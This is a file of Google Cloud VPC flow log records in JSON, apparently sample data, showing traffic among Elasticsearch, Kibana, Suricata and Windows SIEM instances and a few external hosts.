-{"insertId":"1ulp77rfdvho49","jsonPayload":{"bytes_sent":"106409","connection":{"dest_ip":"203.0.113.58","dest_port":65263,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220748025Z","packets_sent":"607","reporter":"SRC","rtt_msec":"87","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.270990648Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho4t","jsonPayload":{"bytes_sent":"61242","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33534},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597088427Z","packets_sent":"356","reporter":"DEST","rtt_msec":"311","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075942176Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho68","jsonPayload":{"bytes_sent":"248826","connection":{"dest_ip":"203.0.113.101","dest_port":49680,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"siem-windows","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"},"end_time":"2019-06-14T03:49:55.705469925Z","packets_sent":"735","reporter":"SRC","rtt_msec":"113","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.711043814Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho5n","jsonPayload":{"bytes_sent":"1777","connection":{"dest_ip":"192.0.2.117","dest_port":33862,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:11.779780615Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:11.655143526Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho5l","jsonPayload":{"bytes_sent":"116845","connection":{"dest_ip":"203.0.113.58","dest_port":65321,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"594","reporter":"SRC","rtt_msec":"219","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.843986502Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho65","jsonPayload":{"bytes_sent":"4614","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33524},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461087350Z","packets_sent":"58","reporter":"DEST","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.790136141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
-{"insertId":"1ulp77rfdvho4b","jsonPayload":{"bytes_sent":"50379","connection":{"dest_ip":"192.0.2.177","dest_port":60112,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:18.224268993Z","packets_sent":"130","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:14.031541248Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
-{"insertId":"1ulp77rfdvho4m","jsonPayload":{"bytes_sent":"200417","connection":{"dest_ip":"10.87.40.76","dest_port":33552,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213244028Z","packets_sent":"250","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075811571Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
-{"insertId":"1ulp77rfdvho5t","jsonPayload":{"bytes_sent":"30233","connection":{"dest_ip":"203.0.113.134","dest_port":33524,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461087350Z","packets_sent":"37","reporter":"SRC","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.790136141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
-{"insertId":"1ulp77rfdvho50","jsonPayload":{"bytes_sent":"160693","connection":{"dest_ip":"10.87.40.76","dest_port":33548,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565451051Z","packets_sent":"237","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147072949Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
-{"insertId":"1ulp77rfdvho63","jsonPayload":{"bytes_sent":"59903","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33694},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565117754Z","packets_sent":"353","reporter":"DEST","rtt_msec":"216","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566551903Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
-{"insertId":"1ulp77rfdvho4r","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"198.51.100.107","dest_port":33924,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:46:20.745658276Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:46:20.634545217Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho4i","jsonPayload":{"bytes_sent":"129335","connection":{"dest_ip":"203.0.113.58","dest_port":65271,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:55.318940798Z","packets_sent":"605","reporter":"SRC","rtt_msec":"89","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.155378070Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
-{"insertId":"1ulp77rfdvho5v","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":33862},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:11.779780615Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:11.655143526Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho5i","jsonPayload":{"bytes_sent":"75477","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65321},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"737","reporter":"DEST","rtt_msec":"219","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.843986502Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
-{"insertId":"1ulp77rfdvho5c","jsonPayload":{"bytes_sent":"102119","connection":{"dest_ip":"203.0.113.58","dest_port":65316,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"600","reporter":"SRC","rtt_msec":"86","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.565831992Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho5p","jsonPayload":{"bytes_sent":"1541638","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.101","src_port":49680},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.705469925Z","packets_sent":"949","reporter":"DEST","rtt_msec":"113","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"siem-windows","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"windows-isolated","vpc_name":"windows-isolated"},"start_time":"2019-06-14T03:39:59.711043814Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b",
"project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho4y","jsonPayload":{"bytes_sent":"755901","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.0.2.177","src_port":60112},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:18.224268993Z","packets_sent":"227","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:14.031541248Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
-{"insertId":"1ulp77rfdvho4o","jsonPayload":{"bytes_sent":"248715","connection":{"dest_ip":"203.0.113.134","dest_port":33558,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.394676451Z","packets_sent":"270","reporter":"SRC","rtt_msec":"144","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:58.492572765Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
-{"insertId":"1ulp77rfdvho5g","jsonPayload":{"bytes_sent":"69757","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65316},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"709","reporter":"DEST","rtt_msec":"86","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.565831992Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho59","jsonPayload":{"bytes_sent":"69440","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65263},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220748025Z","packets_sent":"728","reporter":"DEST","rtt_msec":"87","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:01.270990648Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
-{"insertId":"1ulp77rfdvho57","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":50438},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:20.569744903Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:20.454046087Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho5e","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"192.0.2.117","dest_port":50438,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:20.569744903Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.454046087Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} 
-{"insertId":"1ulp77rfdvho4d","jsonPayload":{"bytes_sent":"2395","connection":{"dest_ip":"192.0.2.165","dest_port":59623,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":45899,"city":"Vĩnh Yên","continent":"Asia","country":"vnm","region":"Vinh Phuc Province"},"end_time":"2019-06-14T03:40:52.361155668Z","packets_sent":"11","reporter":"SRC","rtt_msec":"233","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:46.541094678Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"1ulp77rfdvho5y","jsonPayload":{"bytes_sent":"60335","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33558},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:48.538257098Z","packets_sent":"353","reporter":"DEST","rtt_msec":"144","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:58.492572765Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-pr
oject","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho6a","jsonPayload":{"bytes_sent":"65565","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33548},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565451051Z","packets_sent":"354","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.147072949Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"}
-{"insertId":"1ulp77rfdvho4v","jsonPayload":{"bytes_sent":"70174","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65271},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.318940798Z","packets_sent":"717","reporter":"DEST","rtt_msec":"89","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.155378070Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:11.981912845Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:11.981912845Z"} -{"insertId":"bnj3cofh3cdk1","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":34178},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:46:51.355687385Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:46:51.237256499Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 
-{"insertId":"bnj3cofh3cdjx","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":33602},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:51.090104692Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:50.954948790Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:13.921248755Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:13.921248755Z"} 